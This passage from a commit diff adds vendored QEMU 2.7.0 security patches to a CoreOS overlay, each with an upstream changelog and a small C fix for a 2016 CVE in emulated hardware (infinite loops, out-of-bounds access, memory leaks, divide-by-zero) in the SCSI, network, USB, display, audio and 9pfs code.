in routine 'pvscsi_convert_sglist'. This could lead to an infinite loop
situation for large 'dataLen' values, when data_length is cast to uint32_t
and chunk_size becomes always zero. Fix this by removing the incorrect
cast.
2) pvscsi_get_next_sg_elem can be called arbitrarily many times if the
element has a zero length. Get out of the loop early when this happens,
by introducing an upper limit on the number of SG list elements.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/vmw_pvscsi.c | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)
Update as per:
-> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg01172.html
diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c
index 4245c15..babac5a 100644
--- a/hw/scsi/vmw_pvscsi.c
+++ b/hw/scsi/vmw_pvscsi.c
@@ -40,6 +40,8 @@
#define PVSCSI_MAX_DEVS (64)
#define PVSCSI_MSIX_NUM_VECTORS (1)
+#define PVSCSI_MAX_SG_ELEM 2048
+
#define PVSCSI_MAX_CMD_DATA_WORDS \
(sizeof(PVSCSICmdDescSetupRings)/sizeof(uint32_t))
@@ -628,17 +630,16 @@ pvscsi_queue_pending_descriptor(PVSCSIState *s, SCSIDevice **d,
static void
pvscsi_convert_sglist(PVSCSIRequest *r)
{
- int chunk_size;
+ uint32_t chunk_size, elmcnt = 0;
uint64_t data_length = r->req.dataLen;
PVSCSISGState sg = r->sg;
- while (data_length) {
- while (!sg.resid) {
+ while (data_length && elmcnt < PVSCSI_MAX_SG_ELEM) {
+ while (!sg.resid && elmcnt++ < PVSCSI_MAX_SG_ELEM) {
pvscsi_get_next_sg_elem(&sg);
trace_pvscsi_convert_sglist(r->req.context, r->sg.dataAddr,
r->sg.resid);
}
- assert(data_length > 0);
- chunk_size = MIN((unsigned) data_length, sg.resid);
+ chunk_size = MIN(data_length, sg.resid);
if (chunk_size) {
qemu_sglist_add(&r->sgl, sg.dataAddr, chunk_size);
}
--
2.5.5

28
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-1.patch vendored Normal file
View File

@ -0,0 +1,28 @@
From: Prasad J Pandit <address@hidden>
When LSI SAS1068 Host Bus emulator builds configuration page
headers, the format string used in 'mptsas_config_manufacturing_1'
was wrong. It could lead to an invalid memory access.
Reported-by: Tom Victor <address@hidden>
Fix-suggested-by: Paolo Bonzini <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/mptconfig.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/mptconfig.c b/hw/scsi/mptconfig.c
index 7071854..1ec895b 100644
--- a/hw/scsi/mptconfig.c
+++ b/hw/scsi/mptconfig.c
@@ -203,7 +203,7 @@ size_t mptsas_config_manufacturing_1(MPTSASState *s, uint8_t **data, int address
{
/* VPD - all zeros */
return MPTSAS_CONFIG_PACK(1, MPI_CONFIG_PAGETYPE_MANUFACTURING, 0x00,
- "s256");
+ "*s256");
}
static
--
2.5.5

27
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-2.patch vendored Normal file
View File

@ -0,0 +1,27 @@
From: Prasad J Pandit <address@hidden>
When LSI SAS1068 Host Bus emulator builds configuration page
headers, mptsas_config_pack() asserts to check returned size
value is within limit of 256 bytes. Fix that assert expression.
Suggested-by: Paolo Bonzini <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/mptconfig.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/mptconfig.c b/hw/scsi/mptconfig.c
index 1ec895b..531947f 100644
--- a/hw/scsi/mptconfig.c
+++ b/hw/scsi/mptconfig.c
@@ -158,7 +158,7 @@ static size_t mptsas_config_pack(uint8_t **data, const char *fmt, ...)
va_end(ap);
if (data) {
- assert(ret < 256 && (ret % 4) == 0);
+ assert(ret / 4 < 256);
stb_p(*data + 1, ret / 4);
}
return ret;
--
2.5.5

40
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7170.patch vendored Normal file
View File

@ -0,0 +1,40 @@
From: Prasad J Pandit <address@hidden>
When processing svga command DEFINE_CURSOR in vmsvga_fifo_run,
the computed BITMAP and PIXMAP size are checked against the
'cursor.mask[]' and 'cursor.image[]' array sizes in bytes.
Correct these checks to avoid OOB memory access.
Reported-by: Qinghao Tang <address@hidden>
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/display/vmware_vga.c | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)
diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
index e51a05e..6599cf0 100644
--- a/hw/display/vmware_vga.c
+++ b/hw/display/vmware_vga.c
@@ -676,11 +676,13 @@ static void vmsvga_fifo_run(struct vmsvga_state_s *s)
cursor.bpp = vmsvga_fifo_read(s);
args = SVGA_BITMAP_SIZE(x, y) + SVGA_PIXMAP_SIZE(x, y, cursor.bpp);
- if (cursor.width > 256 ||
- cursor.height > 256 ||
- cursor.bpp > 32 ||
- SVGA_BITMAP_SIZE(x, y) > sizeof cursor.mask ||
- SVGA_PIXMAP_SIZE(x, y, cursor.bpp) > sizeof cursor.image) {
+ if (cursor.width > 256
+ || cursor.height > 256
+ || cursor.bpp > 32
+ || SVGA_BITMAP_SIZE(x, y)
+ > sizeof(cursor.mask) / sizeof(cursor.mask[0])
+ || SVGA_PIXMAP_SIZE(x, y, cursor.bpp)
+ > sizeof(cursor.image) / sizeof(cursor.image[0])) {
goto badcmd;
}
--
2.5.5

34
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7421.patch vendored Normal file
View File

@ -0,0 +1,34 @@
From: Prasad J Pandit <address@hidden>
Vmware Paravirtual SCSI emulator while processing IO requests
could run into an infinite loop if 'pvscsi_ring_pop_req_descr'
always returned positive value. Limit IO loop to the ring size.
Cc: address@hidden
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
Message-Id: <address@hidden>
Signed-off-by: Paolo Bonzini <address@hidden>
---
hw/scsi/vmw_pvscsi.c | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c
index babac5a..a5ce7de 100644
--- a/hw/scsi/vmw_pvscsi.c
+++ b/hw/scsi/vmw_pvscsi.c
@@ -247,8 +247,11 @@ static hwaddr
pvscsi_ring_pop_req_descr(PVSCSIRingInfo *mgr)
{
uint32_t ready_ptr = RS_GET_FIELD(mgr, reqProdIdx);
+ uint32_t ring_size = PVSCSI_MAX_NUM_PAGES_REQ_RING
+ * PVSCSI_MAX_NUM_REQ_ENTRIES_PER_PAGE;
- if (ready_ptr != mgr->consumed_ptr) {
+ if (ready_ptr != mgr->consumed_ptr
+ && ready_ptr - mgr->consumed_ptr < ring_size) {
uint32_t next_ready_ptr =
mgr->consumed_ptr++ & mgr->txr_len_mask;
uint32_t next_ready_page =
--
1.8.3.1

38
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7422.patch vendored Normal file
View File

@ -0,0 +1,38 @@
From: Prasad J Pandit <address@hidden>
virtio back end uses set of buffers to facilitate I/O operations.
If its size is too large, 'cpu_physical_memory_map' could return
a null address. This would result in a null dereference
while un-mapping descriptors. Add check to avoid it.
Reported-by: Qinghao Tang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/virtio/virtio.c | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c
index 15ee3a7..0a4c5b6 100644
--- a/hw/virtio/virtio.c
+++ b/hw/virtio/virtio.c
@@ -472,12 +472,14 @@ static void virtqueue_map_desc(unsigned int *p_num_sg, hwaddr *addr, struct iove
}
iov[num_sg].iov_base = cpu_physical_memory_map(pa, &len, is_write);
- iov[num_sg].iov_len = len;
- addr[num_sg] = pa;
+ if (iov[num_sg].iov_base) {
+ iov[num_sg].iov_len = len;
+ addr[num_sg] = pa;
+ pa += len;
+ num_sg++;
+ }
sz -= len;
- pa += len;
- num_sg++;
}
*p_num_sg = num_sg;
}
--
2.5.5

31
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7423.patch vendored Normal file
View File

@ -0,0 +1,31 @@
From: Li Qiang <address@hidden>
When processing IO request in mptsas, it uses g_new to allocate
a 'req' object. If an error occurs before 'req->sreq' is
allocated, It could lead to an OOB write in mptsas_free_request
function. Use g_new0 to avoid it.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
Message-Id: <address@hidden>
Cc: address@hidden
Signed-off-by: Paolo Bonzini <address@hidden>
---
hw/scsi/mptsas.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
index 0e0a22f..eaae1bb 100644
--- a/hw/scsi/mptsas.c
+++ b/hw/scsi/mptsas.c
@@ -304,7 +304,7 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
goto bad;
}
- req = g_new(MPTSASRequest, 1);
+ req = g_new0(MPTSASRequest, 1);
QTAILQ_INSERT_TAIL(&s->pending, req, next);
req->scsi_io = *scsi_io;
req->dev = s;
--
1.8.3.1

26
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7466.patch vendored Normal file
View File

@ -0,0 +1,26 @@
From: Li Qiang <address@hidden>
If the xhci uses msix, it doesn't free the corresponding
memory, thus leading a memory leak. This patch avoid this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/usb/hcd-xhci.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
index 188f954..281a2a5 100644
--- a/hw/usb/hcd-xhci.c
+++ b/hw/usb/hcd-xhci.c
@@ -3709,8 +3709,7 @@ static void usb_xhci_exit(PCIDevice *dev)
/* destroy msix memory region */
if (dev->msix_table && dev->msix_pba
&& dev->msix_entry_used) {
- memory_region_del_subregion(&xhci->mem, &dev->msix_table_mmio);
- memory_region_del_subregion(&xhci->mem, &dev->msix_pba_mmio);
+ msix_uninit(dev, &xhci->mem, &xhci->mem);
}
usb_bus_release(&xhci->bus);
--
1.8.3.1

45
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7907.patch vendored Normal file
View File

@ -0,0 +1,45 @@
From: Prasad J Pandit <address@hidden>
i.MX Fast Ethernet Controller uses buffer descriptors to manage
data flow to/fro receive & transmit queues. While transmitting
packets, it could continue to read buffer descriptors if a buffer
descriptor has length of zero and has crafted values in bd.flags.
Set an upper limit to number of buffer descriptors.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/imx_fec.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
Update per
-> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg05284.html
diff --git a/hw/net/imx_fec.c b/hw/net/imx_fec.c
index 1c415ab..1d74827 100644
--- a/hw/net/imx_fec.c
+++ b/hw/net/imx_fec.c
@@ -220,6 +220,8 @@ static const VMStateDescription vmstate_imx_eth = {
#define PHY_INT_PARFAULT (1 << 2)
#define PHY_INT_AUTONEG_PAGE (1 << 1)
+#define IMX_MAX_DESC 1024
+
static void imx_eth_update(IMXFECState *s);
/*
@@ -402,12 +404,12 @@ static void imx_eth_update(IMXFECState *s)
static void imx_fec_do_tx(IMXFECState *s)
{
- int frame_size = 0;
+ int frame_size = 0, descnt = 0;
uint8_t frame[ENET_MAX_FRAME_SIZE];
uint8_t *ptr = frame;
uint32_t addr = s->tx_descriptor;
- while (1) {
+ while (descnt++ < IMX_MAX_DESC) {
IMXFECBufDesc bd;
int len;

52
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7908.patch vendored Normal file
View File

@ -0,0 +1,52 @@
From 070c4b92b8cd5390889716677a0b92444d6e087a Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Thu, 22 Sep 2016 16:02:37 +0530
Subject: [PATCH] net: mcf: limit buffer descriptor count
ColdFire Fast Ethernet Controller uses buffer descriptors to manage
data flow to/fro receive & transmit queues. While transmitting
packets, it could continue to read buffer descriptors if a buffer
descriptor has length of zero and has crafted values in bd.flags.
Set upper limit to number of buffer descriptors.
Reported-by: Li Qiang <liqiang6-s@360.cn>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/mcf_fec.c | 5 +++--
1 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/hw/net/mcf_fec.c b/hw/net/mcf_fec.c
index 0ee8ad9..d31fea1 100644
--- a/hw/net/mcf_fec.c
+++ b/hw/net/mcf_fec.c
@@ -23,6 +23,7 @@ do { printf("mcf_fec: " fmt , ## __VA_ARGS__); } while (0)
#define DPRINTF(fmt, ...) do {} while(0)
#endif
+#define FEC_MAX_DESC 1024
#define FEC_MAX_FRAME_SIZE 2032
typedef struct {
@@ -149,7 +150,7 @@ static void mcf_fec_do_tx(mcf_fec_state *s)
uint32_t addr;
mcf_fec_bd bd;
int frame_size;
- int len;
+ int len, descnt = 0;
uint8_t frame[FEC_MAX_FRAME_SIZE];
uint8_t *ptr;
@@ -157,7 +158,7 @@ static void mcf_fec_do_tx(mcf_fec_state *s)
ptr = frame;
frame_size = 0;
addr = s->tx_descriptor;
- while (1) {
+ while (descnt++ < FEC_MAX_DESC) {
mcf_fec_read_bd(&bd, addr);
DPRINTF("tx_bd %x flags %04x len %d data %08x\n",
addr, bd.flags, bd.length, bd.data);
--
1.7.0.4

32
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7909.patch vendored Normal file
View File

@ -0,0 +1,32 @@
From: Prasad J Pandit <address@hidden>
The AMD PC-Net II emulator has set of control and status(CSR)
registers. Of these, CSR76 and CSR78 hold receive and transmit
descriptor ring length respectively. This ring length could range
from 1 to 65535. Setting ring length to zero leads to an infinite
loop in pcnet_rdra_addr. Add check to avoid it.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/pcnet.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
index 198a01f..3078de8 100644
--- a/hw/net/pcnet.c
+++ b/hw/net/pcnet.c
@@ -1429,8 +1429,11 @@ static void pcnet_csr_writew(PCNetState *s, uint32_t rap, uint32_t new_value)
case 47: /* POLLINT */
case 72:
case 74:
+ break;
case 76: /* RCVRL */
case 78: /* XMTRL */
+ val = (val > 0) ? val : 512;
+ break;
case 112:
if (CSR_STOP(s) || CSR_SPND(s))
break;
--
2.5.5

25
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-1.patch vendored Normal file
View File

@ -0,0 +1,25 @@
From: Li Qiang <address@hidden>
In virtio gpu resource create dispatch, if the pixman format is zero
it doesn't free the resource object allocated previously. Thus leading
a host memory leak issue. This patch avoid this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/display/virtio-gpu.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/display/virtio-gpu.c b/hw/display/virtio-gpu.c
index 7fe6ed8..5b6d17b 100644
--- a/hw/display/virtio-gpu.c
+++ b/hw/display/virtio-gpu.c
@@ -333,6 +333,7 @@ static void virtio_gpu_resource_create_2d(VirtIOGPU *g,
qemu_log_mask(LOG_GUEST_ERROR,
"%s: host couldn't handle guest format %d\n",
__func__, c2d.format);
+ g_free(res);
cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
return;
}
--
1.8.3.1

26
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-2.patch vendored Normal file
View File

@ -0,0 +1,26 @@
From: Li Qiang <address@hidden>
While processing isochronous transfer descriptors(iTD), if the page
select(PG) field value is out of bands it will return. In this
situation the ehci's sg list doesn't be freed thus leading a memory
leak issue. This patch avoid this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/usb/hcd-ehci.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index b093db7..f4ece9a 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1426,6 +1426,7 @@ static int ehci_process_itd(EHCIState *ehci,
if (off + len > 4096) {
/* transfer crosses page border */
if (pg == 6) {
+ qemu_sglist_destroy(&ehci->isgl);
return -1; /* avoid page pg + 1 */
}
ptr2 = (itd->bufptr[pg + 1] & ITD_BUFPTR_MASK);
--
1.8.3.1

61
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8576.patch vendored Normal file
View File

@ -0,0 +1,61 @@
From 20009bdaf95d10bf748fa69b104672d3cfaceddf Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <address@hidden>
Date: Fri, 7 Oct 2016 10:15:29 +0200
Subject: [PATCH] xhci: limit the number of link trbs we are willing to process
Signed-off-by: Gerd Hoffmann <address@hidden>
---
hw/usb/hcd-xhci.c | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
index 726435c..ee4fa48 100644
--- a/hw/usb/hcd-xhci.c
+++ b/hw/usb/hcd-xhci.c
@@ -54,6 +54,8 @@
* to the specs when it gets them */
#define ER_FULL_HACK
+#define TRB_LINK_LIMIT 4
+
#define LEN_CAP 0x40
#define LEN_OPER (0x400 + 0x10 * MAXPORTS)
#define LEN_RUNTIME ((MAXINTRS + 1) * 0x20)
@@ -1000,6 +1002,7 @@ static TRBType xhci_ring_fetch(XHCIState *xhci, XHCIRing *ring, XHCITRB *trb,
dma_addr_t *addr)
{
PCIDevice *pci_dev = PCI_DEVICE(xhci);
+ uint32_t link_cnt = 0;
while (1) {
TRBType type;
@@ -1026,6 +1029,9 @@ static TRBType xhci_ring_fetch(XHCIState *xhci, XHCIRing *ring, XHCITRB *trb,
ring->dequeue += TRB_SIZE;
return type;
} else {
+ if (++link_cnt > TRB_LINK_LIMIT) {
+ return 0;
+ }
ring->dequeue = xhci_mask64(trb->parameter);
if (trb->control & TRB_LK_TC) {
ring->ccs = !ring->ccs;
@@ -1043,6 +1049,7 @@ static int xhci_ring_chain_length(XHCIState *xhci, const XHCIRing *ring)
bool ccs = ring->ccs;
/* hack to bundle together the two/three TDs that make a setup transfer */
bool control_td_set = 0;
+ uint32_t link_cnt = 0;
while (1) {
TRBType type;
@@ -1058,6 +1065,9 @@ static int xhci_ring_chain_length(XHCIState *xhci, const XHCIRing *ring)
type = TRB_TYPE(trb);
if (type == TR_LINK) {
+ if (++link_cnt > TRB_LINK_LIMIT) {
+ return -length;
+ }
dequeue = xhci_mask64(trb.parameter);
if (trb.control & TRB_LK_TC) {
ccs = !ccs;
--
1.8.3.1

34
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8577.patch vendored Normal file
View File

@ -0,0 +1,34 @@
From: Li Qiang <address@hidden>
In 9pfs read dispatch function, it doesn't free two QEMUIOVector
object thus causing potential memory leak. This patch avoid this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/9pfs/9p.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 119ee58..543a791 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -1826,14 +1826,15 @@ static void v9fs_read(void *opaque)
if (len < 0) {
/* IO error return the error */
err = len;
- goto out;
+ goto out_free_iovec;
}
} while (count < max_count && len > 0);
err = pdu_marshal(pdu, offset, "d", count);
if (err < 0) {
- goto out;
+ goto out_free_iovec;
}
err += offset + count;
+out_free_iovec:
qemu_iovec_destroy(&qiov);
qemu_iovec_destroy(&qiov_full);
} else if (fidp->fid_type == P9_FID_XATTR) {
--
1.8.3.1

58
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8578.patch vendored Normal file
View File

@ -0,0 +1,58 @@
From ba42ebb863ab7d40adc79298422ed9596df8f73a Mon Sep 17 00:00:00 2001
From: Li Qiang <liqiang6-s@360.cn>
Date: Mon, 17 Oct 2016 14:13:58 +0200
Subject: [PATCH] 9pfs: allocate space for guest originated empty strings
If a guest sends an empty string paramater to any 9P operation, the current
code unmarshals it into a V9fsString equal to { .size = 0, .data = NULL }.
This is unfortunate because it can cause NULL pointer dereference to happen
at various locations in the 9pfs code. And we don't want to check str->data
everywhere we pass it to strcmp() or any other function which expects a
dereferenceable pointer.
This patch enforces the allocation of genuine C empty strings instead, so
callers don't have to bother.
Out of all v9fs_iov_vunmarshal() users, only v9fs_xattrwalk() checks if
the returned string is empty. It now uses v9fs_string_size() since
name.data cannot be NULL anymore.
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
[groug, rewritten title and changelog,
fix empty string check in v9fs_xattrwalk()]
Signed-off-by: Greg Kurz <groug@kaod.org>
---
fsdev/9p-iov-marshal.c | 2 +-
hw/9pfs/9p.c | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/fsdev/9p-iov-marshal.c b/fsdev/9p-iov-marshal.c
index 663cad5..1d16f8d 100644
--- a/fsdev/9p-iov-marshal.c
+++ b/fsdev/9p-iov-marshal.c
@@ -125,7 +125,7 @@ ssize_t v9fs_iov_vunmarshal(struct iovec *out_sg, int out_num, size_t offset,
str->data = g_malloc(str->size + 1);
copied = v9fs_unpack(str->data, out_sg, out_num, offset,
str->size);
- if (copied > 0) {
+ if (copied >= 0) {
str->data[str->size] = 0;
} else {
v9fs_string_free(str);
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 119ee58..39a7e1d 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -3174,7 +3174,7 @@ static void v9fs_xattrwalk(void *opaque)
goto out;
}
v9fs_path_copy(&xattr_fidp->path, &file_fidp->path);
- if (name.data == NULL) {
+ if (!v9fs_string_size(&name)) {
/*
* listxattr request. Get the size first
*/
--
2.7.3

30
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8668.patch vendored Normal file
View File

@ -0,0 +1,30 @@
From: Prasad J Pandit <address@hidden>
Rocker network switch emulator has test registers to help debug
DMA operations. While testing host DMA access, a buffer address
is written to register 'TEST_DMA_ADDR' and its size is written to
register 'TEST_DMA_SIZE'. When performing TEST_DMA_CTRL_INVERT
test, if DMA buffer size was greater than 'INT_MAX', it leads to
an invalid buffer access. Limit the DMA buffer size to avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/rocker/rocker.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/net/rocker/rocker.c b/hw/net/rocker/rocker.c
index 30f2ce4..e9d215a 100644
--- a/hw/net/rocker/rocker.c
+++ b/hw/net/rocker/rocker.c
@@ -860,7 +860,7 @@ static void rocker_io_writel(void *opaque, hwaddr addr, uint32_t val)
rocker_msix_irq(r, val);
break;
case ROCKER_TEST_DMA_SIZE:
- r->test_dma_size = val;
+ r->test_dma_size = val & 0xFFFF;
break;
case ROCKER_TEST_DMA_ADDR + 4:
r->test_dma_addr = ((uint64_t)val) << 32 | r->lower32;
--
2.5.5

29
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-1.patch vendored Normal file
View File

@ -0,0 +1,29 @@
From: Prasad J Pandit <address@hidden>
The JAZZ RC4030 chipset emulator has a periodic timer and
associated interval reload register. The reload value is used
as divider when computing timer's next tick value. If reload
value is large, it could lead to divide by zero error. Limit
the interval reload value to avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/dma/rc4030.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/dma/rc4030.c b/hw/dma/rc4030.c
index 2f2576f..c1b4997 100644
--- a/hw/dma/rc4030.c
+++ b/hw/dma/rc4030.c
@@ -460,7 +460,7 @@ static void rc4030_write(void *opaque, hwaddr addr, uint64_t data,
break;
/* Interval timer reload */
case 0x0228:
- s->itr = val;
+ s->itr = val & 0x01FF;
qemu_irq_lower(s->timer_irq);
set_next_tick(s);
break;
--
2.5.5

34
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-2.patch vendored Normal file
View File

@ -0,0 +1,34 @@
From: Prasad J Pandit <address@hidden>
16550A UART device uses an oscillator to generate frequencies
(baud base), which decide communication speed. This speed could
be changed by dividing it by a divider. If the divider is
greater than the baud base, speed is set to zero, leading to a
divide by zero error. Add check to avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/char/serial.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
Update per
-> https://lists.gnu.org/archive/html/qemu-devel/2016-10/msg02400.html
diff --git a/hw/char/serial.c b/hw/char/serial.c
index 3442f47..eec72b7 100644
--- a/hw/char/serial.c
+++ b/hw/char/serial.c
@@ -153,8 +153,9 @@ static void serial_update_parameters(SerialState *s)
int speed, parity, data_bits, stop_bits, frame_size;
QEMUSerialSetParams ssp;
- if (s->divider == 0)
+ if (s->divider == 0 || s->divider > s->baudbase) {
return;
+ }
/* Start bit. */
frame_size = 1;
--
2.5.5

31
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8909.patch vendored Normal file
View File

@ -0,0 +1,31 @@
From: Prasad J Pandit <address@hidden>
Intel HDA emulator uses stream of buffers during DMA data
transfers. Each entry has buffer length and buffer pointer
position, which are used to derive bytes to 'copy'. If this
length and buffer pointer were to be same, 'copy' could be
set to zero(0), leading to an infinite loop. Add check to
avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/audio/intel-hda.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/audio/intel-hda.c b/hw/audio/intel-hda.c
index cd95340..537face 100644
--- a/hw/audio/intel-hda.c
+++ b/hw/audio/intel-hda.c
@@ -416,7 +416,8 @@ static bool intel_hda_xfer(HDACodecDevice *dev, uint32_t stnr, bool output,
}
left = len;
- while (left > 0) {
+ s = st->bentries;
+ while (left > 0 && s-- > 0) {
copy = left;
if (copy > st->bsize - st->lpib)
copy = st->bsize - st->lpib;
--
2.7.4

29
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8910.patch vendored Normal file
View File

@ -0,0 +1,29 @@
From: Prasad J Pandit <address@hidden>
RTL8139 ethernet controller in C+ mode supports multiple
descriptor rings, each with maximum of 64 descriptors. While
processing transmit descriptor ring in 'rtl8139_cplus_transmit',
it does not limit the descriptor count and runs forever. Add
check to avoid it.
Reported-by: Andrew Henderson <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/rtl8139.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 3345bc6..f05e59c 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2350,7 +2350,7 @@ static void rtl8139_cplus_transmit(RTL8139State *s)
{
int txcount = 0;
- while (rtl8139_cplus_transmit_one(s))
+ while (txcount < 64 && rtl8139_cplus_transmit_one(s))
{
++txcount;
}
--
2.7.4

21
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9102.patch vendored Normal file
View File

@ -0,0 +1,21 @@
From: Li Qiang <address@hidden>
The 'fs.xattr.value' field in V9fsFidState object doesn't consider the
situation that this field has been allocated previously. Every time, it
will be allocated directly. This leads a host memory leak issue. This
patch fix this.
--
1.8.3.1
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 75ba5f1..a4c7109 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -3269,6 +3269,7 @@ static void v9fs_xattrcreate(void *opaque)
xattr_fidp->fs.xattr.flags = flags;
v9fs_string_init(&xattr_fidp->fs.xattr.name);
v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);
+ g_free(xattr_fidp->fs.xattr.value);
xattr_fidp->fs.xattr.value = g_malloc(size);
err = offset;
put_fid(pdu, file_fidp);

27
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9103.patch vendored Normal file
View File

@ -0,0 +1,27 @@
Author: Li Qiang <liqiang6-s@360.cn>
Date: Mon Oct 17 14:13:58 2016 +0200
9pfs: fix information leak in xattr read
9pfs uses g_malloc() to allocate the xattr memory space, if the guest
reads this memory before writing to it, this will leak host heap memory
to the guest. This patch avoid this.
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
Reviewed-by: Greg Kurz <groug@kaod.org>
Signed-off-by: Greg Kurz <groug@kaod.org>
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 26aa7d5..bf23b01 100644
--- a/hw/9pfs/9p.c
